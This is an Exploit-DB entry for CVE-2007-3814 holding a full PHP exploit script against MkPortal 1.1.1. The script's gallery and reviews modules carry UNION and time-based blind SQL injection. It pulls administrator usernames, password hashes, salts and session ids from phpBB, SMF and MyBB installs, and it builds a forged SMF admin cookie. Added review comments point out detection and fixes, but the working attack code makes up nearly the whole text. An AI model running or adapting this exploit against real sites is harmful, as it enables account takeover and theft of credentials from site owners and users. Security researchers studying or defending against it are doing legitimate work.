MkPortal <= 1.1.1 reviews / gallery modules SQL Injection Exploit

2007-07-12T00:00:00
ID EDB-ID:4179
Type exploitdb
Reporter Coloss
Modified 2007-07-12T00:00:00

Description

MkPortal <= 1.1.1 reviews / gallery modules SQL Injection Exploit. CVE-2007-3814. Webapps exploit for php platform

                                        
<?php

/*
[i] MkPortal "reviews" and "gallery" modules SQL Injection Exploit
[i] Vulnerable versions: MkPortal &lt;= 1.1.1
[i] Bug discovered by: Coloss
[i] Exploit by: Coloss
[i] Date: 06.07.2007
[i] This is priv8 not for kids

[Notes]
At this time MkPortal 1.1.1 is the latest stable release
Currently implemented: phpbb, smf and mybb
*/


// --- Tunables ---------------------------------------------------------------
// $exptime: assumed session lifetime in seconds; phpbb_exploit() subtracts it
//           from (now - session_time) to decide whether a recovered sid is stale.
// $stcnt:   BENCHMARK() iteration count used as the "slow" reference by the
//           timing oracle (get_delay() / get_normaldelay()).
// $maxnull: assigned here but never read anywhere in this file.
$exptime = 3600;
$stcnt = 300000;
$maxnull = 5;

// Command-line options; help() documents each letter.
$opts = getopt("u:U:P:f:m:d:o:");

// Flat list alternating a lookup key with the UNION query template it selects
// (walked one slot at a time by get_sql()). Each template's %s is replaced
// later with the column list to read. Table names carry the default install
// prefixes (phpbb_, smf_, mybb_), which is why exploit_gallery() reports a
// query failure as a probable prefix mismatch.
// NOTE(review): these fixed fragments reach the server URL-encoded in the
// `iden` query parameter, so they are straightforward to match in web-server
// access logs or a WAF rule.
$vars = array ( "phpbb", "1 UNION SELECT %s FROM phpbb_users WHERE user_id=2",
                "phpbb_sid", "1 UNION SELECT %s FROM phpbb_sessions WHERE session_user_id=2 ORDER BY descrizione DESC LIMIT 1",
                "smf", "1 UNION SELECT %s FROM smf_members WHERE ID_MEMBER=1",
                "mybb", "1 UNION SELECT %s FROM mybb_users WHERE uid=1",
);


// Banner; same text as the header comment.
print
"[i] MkPortal \"reviews\" and \"gallery\" modules SQL Injection Exploit
[i] Vulnerable versions: MkPortal &lt;= 1.1.1
[i] Bug discovered by: Coloss
[i] Exploit by: Coloss
[i] Date: 06.07.2007
[i] This is priv8 not for kids\n\n";


// The target URL is the only mandatory option.
// (Option keys are written unquoted, $opts[u] rather than $opts['u'] — legacy
// undefined-constant fallback.)
if ($opts[u] == '')
        die(help($argv[0]));

// Prepend a scheme when none was given. $url is used below as a bare prefix
// ($url."index.php...", $url.$dir."login.php"), so it must already end in "/";
// nothing appends one.
if (!strncmp($opts[u], "http", 4))
        $url = $opts[u];
else
        $url = "http://".$opts[u];

// Optional settings; unset ones stay undefined and are tested with `if ($x)` later.
if ($opts[U])
        $user = $opts[U];
if ($opts[P])
        $pass = $opts[P];
if ($opts[f])
        $forum = $opts[f];
if ($opts[m])
        $met = $opts[m];
if ($opts[o])
        $file = $opts[o];
if ($opts[d])
        $dir = $opts[d];

// Per-run state shared with the functions below via `global`:
//   $cookies      cookie header value obtained by a login, sent with every request
//   $delay        calibrated baseline response time in tenths of a second
//   $min/$max     inclusive ORD() range of characters tried by exploit_blind()
//   $mid          code at which exploit_blind() jumps ahead to 97 ('a')
//   $fld1/$fld2   column names currently being read
$cookies = '';
$delay = $min = $max = $mid = 0;
$fld1 = $fld2 = '';

if (!$forum)
        die("[X] You haven't specified any forum type!\n");

echo "[+] Target: $url [$forum]\n\n";

// Entry point. The functions are declared further down; PHP hoists
// unconditional top-level function declarations, so the call is valid here.
exploit();


/**
 * Direct (non-blind) read through the gallery module.
 *
 * The UNION template for $f is filled with a 5-column list
 * (NULL,$fld1,$fld2,NULL,NULL) and sent as the `iden` parameter of
 * index.php?ind=gallery&op=edit_file. The page renders the selected row back
 * into its edit form, so the two requested columns are cut out of the "titolo"
 * input value and the "descrizione" select and returned space-separated.
 *
 * The 5-column shape presumably mirrors the module's own SELECT — inferred
 * from the padding, not verified against MkPortal's source.
 *
 * NOTE(review): two server-side behaviours make this path work and are the
 * things to fix in the module — `iden` (apparently an integer id, the
 * templates start with "1 UNION ...") reaches the query without being cast or
 * bound as a parameter, and the raw "ERROR: Database error" page hands the
 * client direct feedback on query failure.
 */
function exploit_gallery ($f)
{
        global $cookies, $url, $fld1, $fld2;
        $sql = get_sql($f);
        $str = "NULL,".$fld1.",".$fld2.",NULL,NULL";
        $req = sprintf($sql, $str);

        $u = $url."index.php?ind=gallery&op=edit_file&iden=".urlencode($req);
        $html = Send($u, NULL, $cookies);
        // Query failure: the author attributes it to the hard-coded table prefix in $vars.
        if (strstr($html, "ERROR: Database error"))
                die("[X] SQL Query Error.. probably wrong table prefix\n");
        // Generic error page without a DB error: nothing was echoed back, give up on this method.
        else if (strstr($html, "&lt;title&gt;Error&lt;/title&gt;"))
                die("[X] This method failed. Try something else\n");

        // Scrape the two values out of the edit form markup.
        $var1 = get_string($html,"name=\"titolo\" value=\"","\"");
        $var2 = get_string($html,"name=\"descrizione\" class=\"bgselect\"&gt;","&lt;");

        return ($var1." ".$var2);
}

/**
 * Time one request that carries a BENCHMARK() clause — the probe used to
 * calibrate the timing oracle.
 *
 * @param int    $cnt  BENCHMARK() iteration count (1 = practically no delay,
 *                     $stcnt = the "slow" reference).
 * @param string $f    key into $vars (see get_sql()).
 * @param string $u    URL prefix up to and including "iden=".
 * @return int  elapsed time in tenths of a second (truncated).
 *
 * The IF() compares ORD() of the first character of $fld1 with 1, which is
 * false for any printable character, so the BENCHMARK branch (the false branch
 * in this variant) is what gets timed. When the template has an ORDER BY the
 * clause is spliced in before it so the statement stays valid.
 *
 * NOTE(review): on the database side these probes are statements containing
 * BENCHMARK(...,MD5(31337)); a slow-query log or processlist watch catches
 * them, and the calibration calls arrive in quick succession from one client.
 */
function get_delay ($cnt, $f, $u)
{
        global $url, $cookies, $fld1, $fld2, $met;

        $sql = get_sql($f);

        // Gallery templates need the 5-column padding, reviews a single column.
        if (strstr($met, "gallery"))
                $str = "NULL,".$fld1.",".$fld2.",NULL,NULL";
        else
                $str = $fld1;

        $inj = sprintf($sql, $str);

        // Keep ORDER BY ... LIMIT at the end of the statement.
        if (strstr($inj, "ORDER BY")) {
                list($base, $order) = explode("ORDER BY", $inj);
                $inj = $base."AND IF(ORD(LOWER(SUBSTR(%s,%d,1)))%s,1,BENCHMARK(%d,MD5(31337))) ORDER BY". $order;
        }
        else
                $inj .= " AND IF(ORD(SUBSTR(%s,%d,1))%s,1,BENCHMARK(%d,MD5(31337)))";

        // Placeholders: column, position 1, comparison "=1" (expected false), iteration count.
        $req = sprintf($inj, $fld1, 1, "=1", $cnt);
        $u .= urlencode($req);

        $start = getmicrotime();
        Send($u, NULL, $cookies);
        $end = getmicrotime();

        // Tenths of a second.
        $delay = intval(10 * ($end - $start));
        return $delay;
}

/**
 * Calibrate the oracle: probe three times with $stcnt iterations, interleaved
 * with count-1 probes whose results ($na, $nb, $nc) are discarded, and return
 * the mean delayed time in tenths of a second.
 *
 * Aborts when the mean is under 2 (0.2 s): a response that fast means
 * BENCHMARK() did not run, which the author attributes to missing privileges.
 */
function get_normaldelay ($f, $u)
{
        global $stcnt;

        $na = get_delay(1,$f,$u);
        $da = get_delay($stcnt,$f,$u);
        $nb = get_delay(1,$f,$u);
        $db = get_delay($stcnt,$f,$u);
        $nc = get_delay(1,$f,$u);
        $dc = get_delay($stcnt,$f,$u);

        // Only the three delayed measurements feed the baseline.
        $mean_delayed = intval(($da + $db + $dc) / 3);
        if ($mean_delayed &lt; 2)
                die("Failed. The Answer was too rapid, probably you have not enough privileges\n");
        return $mean_delayed;
}

/**
 * Character-by-character timing extraction of one column.
 *
 * @param string $sql   query with the IF(...BENCHMARK...) clause already
 *                      appended by exploit_init_blind().
 * @param string $u     URL prefix up to and including "iden=".
 * @param string $field column name substituted into the clause.
 * @return string|null  the recovered value, or null when nothing matched
 *                      ($out starts undefined and is only ever appended to).
 *
 * For each position 1..50 the candidate ORD values $min..$max are sent one at
 * a time; a response slower than twice the calibrated $delay counts as a hit
 * (in this clause the BENCHMARK sits in the IF's true branch). When the
 * candidate reaches $mid it jumps to 97 ('a'), so codes $mid..96 are never
 * tried — with $mid = 58 that is the punctuation and uppercase block, which is
 * why exploit_init_blind() wraps the character in LOWER() for that setting.
 * Exhausting the range at a position sets $i to 41, so the outer loop winds
 * down over its remaining iterations rather than stopping at once. Extraction
 * uses 4 x $stcnt iterations, a heavier load than the calibration probes.
 *
 * NOTE(review): the resulting traffic is a long burst of requests that differ
 * only in the SUBSTR offset and compared value, with strongly bimodal
 * response times — a pattern that can be rate-limited or alerted on at the
 * web tier without inspecting the SQL at all.
 */
function exploit_blind ($sql, $u, $field)
{
        global $cookies, $stcnt, $delay, $min, $max, $mid;

        $cnt = $stcnt * 4;

        echo "[-&gt;] Trying to find value for '".$field."'\n";

        for ($i = 1; $i &lt; 51; $i++) {
                for ($j = $min; $j &lt;= $max; $j++) {
                        // Skip $mid..96 (see function comment).
                        if ($j == $mid)
                                $j = 97;
                        $req = sprintf($sql, $field, $i, "=$j", $cnt);
                        $ur = $u.urlencode($req);
                        $start = getmicrotime();
                        Send($ur, NULL, $cookies);
                        $end = getmicrotime();

                        // Tenths of a second; a hit is anything over twice the baseline.
                        $dtime = intval(10 * ($end - $start));
                        if ($dtime &gt; ($delay * 2)) {
                                $out .= chr($j);
                                echo "[+] Current value for '".$field."' (".$i."): ".$out."\n";
                                break;
                        }
                        // No candidate matched at this position.
                        if ($j == $max)
                                $i = 41;
                }
        }
        if ($out)
                echo "\n[-&gt;] Found value for '".$field."': ".$out."\n\n";
        return $out;
}


/**
 * Blind variant for the gallery module: same 5-column padding as
 * exploit_gallery(), but the values are read through the timing oracle, one
 * column after the other. Returns "<fld1 value> <fld2 value>".
 */
function exploit_gallery_blind ($f)
{
        global $fld1, $fld2, $url;

        $str = "NULL,".$fld1.",".$fld2.",NULL,NULL";
        $sql = get_sql($f);
        $inj = sprintf($sql, $str);

        // Prefix only; exploit_blind() appends the URL-encoded statement per request.
        $u = $url."index.php?ind=gallery&op=edit_file&iden=";

        $var1 = exploit_init_blind($f, $u, $inj, $fld1);
        $var2 = exploit_init_blind($f, $u, $inj, $fld2);

        return ($var1." ".$var2);
}

/**
 * Blind read through the reviews module
 * (index.php?ind=reviews&op=update_file&iden=). The template's %s is filled
 * with a single column name here — presumably the module's own query selects
 * one column; not verified. Each column gets its own statement and its own
 * exploit_init_blind() run. Returns "<fld1 value> <fld2 value>".
 */
function exploit_reviews ($f)
{
        global $fld1, $fld2, $url;

        $u = $url."index.php?ind=reviews&op=update_file&iden=";
        $sql = get_sql($f);

        $inj = sprintf($sql, $fld1);
        $var1 = exploit_init_blind($f, $u, $inj, $fld1);

        $inj = sprintf($sql, $fld2);
        $var2 = exploit_init_blind($f, $u, $inj, $fld2);

        return ($var1." ".$var2);
}

/**
 * Build the timing clause for one column, calibrate, and run the extraction.
 *
 * Appends " AND IF(ORD(SUBSTR(%s,%d,1))%s,BENCHMARK(%d,MD5(31337)),1)" to $inj
 * (inserted before ORDER BY when the template has one). With $mid == 58 the
 * character is wrapped in LOWER(), because that character set skips the
 * uppercase block (see exploit_blind()). The %s/%d placeholders are filled per
 * request by exploit_blind(). $delay is (re)calibrated through
 * get_normaldelay() before every column.
 *
 * For keys containing "sid" an empty result is fatal; the author's explanation
 * is that more than one session row may exist.
 */
function exploit_init_blind ($f, $u, $inj, $field)
{
        global $cookies, $delay, $fld1, $fld2, $mid;

        if (strstr($inj, "ORDER BY")) {
                list($base, $order) = explode("ORDER BY", $inj);
                if ($mid == 58)
                        $inj = $base."AND IF(ORD(LOWER(SUBSTR(%s,%d,1)))%s,BENCHMARK(%d,MD5(31337)),1) ORDER BY". $order;
                else
                        $inj = $base."AND IF(ORD(SUBSTR(%s,%d,1))%s,BENCHMARK(%d,MD5(31337)),1) ORDER BY". $order;
        }
        else {
                if ($mid == 58)
                        $inj .= " AND IF(ORD(LOWER(SUBSTR(%s,%d,1)))%s,BENCHMARK(%d,MD5(31337)),1)";
                else
                        $inj .= " AND IF(ORD(SUBSTR(%s,%d,1))%s,BENCHMARK(%d,MD5(31337)),1)";
        }

        echo "[-&gt;] Starting blind sql injection!\n";

        // Baseline in tenths of a second ("ds").
        echo "[+] Getting standard response delay... ";
        $delay = get_normaldelay($f,$u);
        echo $delay."ds\n\n";

        $var = exploit_blind($inj, $u, $field);
        if (strstr($f, "sid") && !$var)
                die("[X] Probably there are more sid in the table.. so we cannot fetch it.. retry later.\n");

        return $var;
}

/**
 * Dispatch on the -m method: 'reviews' and 'gallery-blind' use the timing
 * oracle, 'gallery' reads values directly from the page. $f is the $vars key.
 * An unknown method aborts the run.
 */
function get_data ($f)
{
        global $met;

        switch ($met) {
                case 'reviews':
                        $res = exploit_reviews($f); break;
                case 'gallery-blind':
                        $res = exploit_gallery_blind($f); break;
                case 'gallery':
                        $res = exploit_gallery($f); break;
                default:
                        die("[X] Invalid exploit method specified\n");
        }
        return $res;
}

/**
 * phpBB target: optional login, then the administrator's username and password
 * hash, then the administrator's session id.
 *
 * Login: POST to "$dir/login.php?login=true" and keep the last Set-Cookie line
 * mentioning "sid"; at least two such lines are required ($c counts them from
 * an undefined start) or the run aborts.
 * Step 1 reads username/user_password (user_id=2 per the $vars template) over
 * ORD range 48..122 with $mid 58 (digits, then lowercase) and expects a
 * 32-character hash.
 * Step 2 reads session_id/session_time with $max lowered to 102 ('f'), i.e. a
 * hex string, and reports how long the session would still be valid assuming
 * the $exptime lifetime.
 *
 * NOTE(review): step 2 works because session ids sit in the table in usable
 * form and are only time-bound; short session lifetimes and re-issuing the
 * session on privilege-sensitive actions shrink the window in which a copied
 * id is worth anything.
 */
function phpbb_exploit ()
{
        global $dir, $url, $user, $pass, $cookies, $forum, $exptime, $fld1, $fld2, $min, $max, $mid;

        if ($user && $pass) {
                echo "[+] Logging in... ";

                $u = $url.$dir."login.php?login=true";
                $post = "username=".$user."&password=".$pass."&redirec=portalhome&submit=Login";

                // Headers included so the Set-Cookie lines can be scraped.
                $html = Send($u, $post, NULL, TRUE);

                $lines = explode("\n", $html);

                foreach($lines as $line) {
                        if (strstr($line, "Set-Cookie") && strstr($line, "sid")) {
                                $cookies = get_string($line, "Set-Cookie: ", ";");
                                $c++;
                        }
                }
                if (!$cookies || $c &lt; 2)
                        die("Failed\n");
                echo "Successfull\n\n";
        }

        // Step 1: account columns, character set digits + lowercase.
        $fld1 = "username"; $fld2 = "user_password";
        $min = 48; $max = 122; $mid = 58;

        $res = get_data($forum);
        list($auesr, $apwd) = explode(" ", $res);
        if ($auser && strlen($apwd) == 32) {
                owrite("\n[+] Target: $url [$forum]\n");
                owrite("[-&gt;] Found admin username: '".$auser."'\n");
                owrite("[-&gt;] Found admin hash password: '".$apwd."'\n");
        }
        else
                die("[X] Failed to retrive informations\n");

        // Step 2: session columns; hex only, so the range stops at 'f'.
        $fld1 = "session_id"; $fld2 = "session_time";
        $max = 102;

        $res = get_data($forum."_sid");
        list($sid,$start) = explode(" ", $res);
        if ($sid && strlen($sid) == 32) {
                // Age of the session beyond $exptime; negative means still inside the lifetime.
                $t = (int) (time() - $start - $exptime);
                if ($t &gt;= 0)
                        echo "[!] Found admin sid ('".$sid."') but it should not be valid anymore\n";
                else
                        owrite("[-&gt;] Found admin sid: '".$sid."' valid for ~".abs($t)."s\n");
        }
        else
                echo "[!] No admin sid was found\n";
}

/**
 * SMF target: optional login, then the administrator's password hash and salt,
 * from which a login cookie value is derived.
 *
 * Login: POST to "$dir/index.php?action=login2"; the last Set-Cookie line that
 * is not PHPSESSID becomes $cookies. The cookie name ($cname) is later taken
 * from it, so the reported cookie name is only meaningful after a login.
 * Extraction reads passwd/passwordSalt (ID_MEMBER=1) over the hex range
 * 48..102 and expects a 40-character hash plus a 4-character salt. The cookie
 * value is the serialised array in $base with sha1(hash . salt) in the
 * 40-character slot and a fixed timestamp (1184000000).
 *
 * NOTE(review): the cookie is rebuilt from at-rest values alone, which is the
 * design lesson here — a session credential that is a pure function of stored
 * data is exactly as sensitive as that data, and a read of the user table is
 * equivalent to a login.
 */
function smf_exploit ()
{
        global $user, $pass, $url, $dir, $cookies, $forum, $fld1, $fld2, $min, $max;

        // Serialised cookie layout; %s receives the 40-character sha1.
        $base = 'a:4:{i:0;s:1:"1";i:1;s:40:"%s";i:2;i:1184000000;i:3;i:0;}';

        if ($user && $pass) {
                echo "[+] Logging in... ";

                $u = $url.$dir."index.php?action=login2";
                $post = "user=".$user."&passwrd=".$pass."&cookieneverexp=on&submit=Login";
                $html = Send($u, $post, NULL, TRUE);

                $lines = explode("\n", $html);
                foreach($lines as $line) {
                        if (strstr($line, "Set-Cookie") && !strstr($line, "PHPSESSID"))
                                $cookies = get_string($line, "Set-Cookie: ", ";");
                }
                if (!$cookies)
                        die("Failed\n");
                echo "Successfull\n\n";
        }

        // Hex values only, so the range stops at 'f'.
        $fld1 = "passwd"; $fld2 = "passwordSalt";
        $min = 48; $max = 102; $mid = 58;

        $res = get_data($forum);
        list($pwd,$salt) = explode(" ", $res);
        if ($pwd && strlen($pwd) == 40 && strlen($salt) == 4) {
                $pass = $pwd.$salt;
                $pass = sha1($pass);
                $cookie = sprintf($base, $pass);
                list($cname) = explode("=", $cookies);
                owrite("\n[+] Target: $url [$forum]\n");
                owrite("[+] Found admin cookie '".$cname."': '".urlencode($cookie)."'\n");
        }
        else
                die("[X] Failed to retrive informations\n");
}

/**
 * MyBB target: optional login, then the administrator's loginkey and username,
 * then the password hash and salt.
 *
 * Login: POST to "$dir/member.php"; the last Set-Cookie line that is not
 * PHPSESSID, "[last" or " sid=" becomes $cookies.
 * Step 1 reads loginkey/username (uid=1) over 48..122 with $mid 91 (digits,
 * uppercase, then lowercase) and expects a 50-character key; the reported
 * cookie value is "1_" . key. $base is not defined in this function, so the
 * sprintf() on it yields nothing useful and $cookie goes unused.
 * Step 2 reads password/salt and expects 32 and 8 characters. Its failure
 * message ("No admin sid was found") looks copied from phpbb_exploit().
 */
function mybb_exploit ()
{
        global $user, $pass, $url, $dir, $cookies, $forum, $fld1, $fld2, $min, $max, $mid;

        if ($user && $pass) {
                echo "[+] Logging in... ";

                $u = $url.$dir."member.php";
                $post = "username=".$user."&password=".$pass."&action=do_login&submit=Login";
                $html = Send($u, $post, NULL, TRUE);

                $lines = explode("\n", $html);
                foreach($lines as $line) {
                        if (strstr($line, "Set-Cookie") && !strstr($line, "PHPSESSID") && !strstr($line, "[last") && !strstr($line,  
" sid=")) {
                                $cookies = get_string($line, "Set-Cookie: ", ";");
                        }
                }
                if (!$cookies)
                        die("Failed\n");
                echo "Successfull\n\n";
        }

        // Step 1: loginkey is mixed-case alphanumeric, so uppercase is kept (mid after 'Z').
        $fld1 = "loginkey"; $fld2 = "username";
        $min = 48; $max = 122; $mid = 91;

        $res = get_data($forum);
        list($key,$auser) = explode(" ", $res);
        if ($key && strlen($key) == 50) {
                $cookie = sprintf($base, $pass);
                list($cname) = explode("=", $cookies);
                owrite("\n[+] Target: $url [$forum]\n");
                owrite("[+] Found admin cookie '".$cname."': '1_".$key."'\n");
        }
        else
                die("[X] Failed to retrive informations\n");

        // Step 2: hash and salt, same character range as step 1.
        $fld1 = "password"; $fld2 = "salt";

        $res = get_data($forum);
        list($apwd,$salt) = explode(" ", $res);
        if ($apwd && strlen($apwd) == 32 && $salt && strlen($salt) == 8) {
                owrite("[+] Found admin hash password: '".$apwd."'\n");
                owrite("[+] Found admin password salt: '".$salt."'\n");
        }
        else
                echo "[!] No admin sid was found\n";
}

/**
 * Top-level dispatch on the -f forum type; each handler drives the whole run
 * for its platform and aborts with die() on failure. Only the three keys
 * present in $vars are accepted.
 */
function exploit ()
{
        global $forum;

        switch ($forum) {
                case 'phpbb':
                        phpbb_exploit(); break;
                case 'smf':
                        smf_exploit(); break;
                case 'mybb':
                        mybb_exploit(); break;
                default:
                        die("Failed. Cannot handle this type of forum\n");
        }
}

/**
 * Return the text between the first occurrence of $start and the next
 * occurrence of $end after it. Used to cut values out of HTML and Set-Cookie
 * lines.
 *
 * There is no failure handling: when $start or $end is absent, strpos()
 * yields false and the offset / length arithmetic proceeds with it coerced
 * to 0, so callers get '' or a slice from the string start rather than an error.
 */
function get_string ($str, $start, $end)
{
        $from = strpos($str, $start) + strlen($start);
        $tail = substr($str, $from, strlen($str));
        $len = strpos($tail, $end);
        return substr($str, $from, $len);
}

/**
 * Look up the query template registered for $var in the global $vars list.
 *
 * $vars is a flat list in which a key is immediately followed by its template.
 * The walk advances one slot at a time (templates are compared too) and stops
 * at the first empty slot; the slot after the first match is returned, null
 * when nothing matches.
 */
function get_sql ($var)
{
        global $vars;

        $pos = 0;
        while (isset($vars[$pos]) && $vars[$pos]) {
                if ($vars[$pos] == $var)
                        return $vars[$pos + 1];
                $pos++;
        }
}

/**
 * Current Unix time as a float with microsecond resolution, assembled from the
 * "usec sec" string that microtime() returns when called without an argument.
 */
function getmicrotime()
{
        $parts = explode(" ", microtime());
        $seconds = (float)$parts[1];
        $fraction = (float)$parts[0];
        return $seconds + $fraction;
}

/**
 * Minimal cURL GET/POST wrapper.
 *
 * @param string $url          request URL
 * @param string $post_fields  raw urlencoded body; when non-empty the request is a POST
 * @param string $cookie       Cookie header value; sent only when non-empty
 * @param bool   $headers      TRUE to include the response headers in the returned string
 * @return string|false  response (headers + body when requested), or false on transport failure
 *
 * Characteristics worth knowing for anyone reusing or looking for this client:
 * redirects are not followed, the user agent is a fixed IE6 string, the
 * connect timeout is 120 s, and TLS peer verification is switched off — the
 * connection accepts any certificate, so it is open to interception.
 */
function Send($url, $post_fields='', $cookie = '', $headers = FALSE)
{
        $options = array(
                CURLOPT_URL => $url,
                CURLOPT_RETURNTRANSFER => 1,
                CURLOPT_CONNECTTIMEOUT => 120,
                CURLOPT_FOLLOWLOCATION => 0,
                CURLOPT_USERAGENT => 'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)',
                CURLOPT_HEADER => ($headers === TRUE),
                CURLOPT_SSL_VERIFYPEER => FALSE,
        );

        if ($post_fields) {
                $options[CURLOPT_POST] = 1;
                $options[CURLOPT_POSTFIELDS] = $post_fields;
        }

        if (!empty($cookie))
                $options[CURLOPT_COOKIE] = $cookie;

        $handle = curl_init();
        curl_setopt_array($handle, $options);
        $response = curl_exec($handle);
        curl_close($handle);

        return $response;
}

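/**
 * Print $msg to stdout and, when an output file (-o) was given, append it there.
 *
 * Reads the globals $file (output path; empty means stdout only) and $debug
 * (when truthy, file errors are reported on stdout). File errors never abort
 * the run: the message has already been echoed and the file is best-effort.
 */
function owrite ($msg)
{
        global $file, $debug;

        echo $msg;

        if (!$file)
                return;

        $h = fopen($file, 'ab');
        // Bail out on any open failure. Previously a failed fopen() only
        // returned when $debug was set and otherwise fell through to
        // fwrite(FALSE, ...).
        if ($h === FALSE) {
                if ($debug)
                        echo "[X] Cannot open '$file'\n";
                return;
        }
        if (fwrite($h, $msg) === FALSE && $debug)
                echo "[X] Cannot write to '$file'\n";
        fclose($h);
}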

/**
 * Print the command-line usage text. $prog is the script name (argv[0]); the
 * option letters match the getopt() specification at the top of the file.
 */
function help ($prog)
{
        $usage = "[-] Usage: $prog
         -u  &lt;url&gt;      -&gt; Sets Target url
        [-U] &lt;user&gt;     -&gt; Your username
        [-P] &lt;hash&gt;     -&gt; Your password
        [-f] &lt;type&gt;     -&gt; Sets Forum type (phpbb, smf or mybb)
        [-m] &lt;method&gt;   -&gt; Which method do you want to use (gallery or reviews)
        [-d] &lt;dir&gt;      -&gt; Sets forum subdirectory
        [-o] &lt;file&gt;     -&gt; Writes results to a file\n";
        echo $usage;
}

?>

# milw0rm.com [2007-07-12]